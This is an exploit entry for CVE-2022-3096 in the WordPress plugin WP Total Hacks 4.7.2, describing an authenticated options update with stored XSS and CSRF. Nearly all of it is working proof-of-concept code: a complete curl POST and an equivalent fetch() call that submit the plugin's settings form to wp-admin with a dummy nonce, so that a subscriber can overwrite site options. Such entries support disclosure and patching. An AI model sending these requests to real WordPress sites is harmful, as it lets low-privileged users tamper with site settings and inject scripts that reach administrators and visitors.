CVE: CVE-2022-3096 Name: WP Total Hacks (wp-total-hacks) Version: 4.7.2 Date: 2022-04-01 19:56:10 Advisory: https://wpscan.com/vulnerability/46996537-a874-4b2e-9cd7-7d0832f9704d Type: Authenticated Options Update, Stored XSS, CSRF Exploit: Log in as subscriber and send a request, no permissions or capability checks and no further sanitizations are done. Also allows Stored XSS. curl "https://example.com/wp-admin/" -X POST -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H "Accept-Language: de,en;q=0.7,en-US;q=0.3" -H "Accept-Encoding: gzip, deflate" -H "Referer: https://example.com/wp-admin/" -H "Content-Type: application/x-www-form-urlencoded" -H "Upgrade-Insecure-Requests: 1" -H "Origin: https://example.com" -H "DNT: 1" -H "Connection: keep-alive" -H "Cookie: wordpress_..." -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: same-origin" --data-raw "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern" await fetch("https://example.com/wp-admin/", { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "de,en;q=0.7,en-US;q=0.3", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1" }, "referrer": "https://example.com/wp-admin/", "body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern", "method": "POST", "mode": "cors" });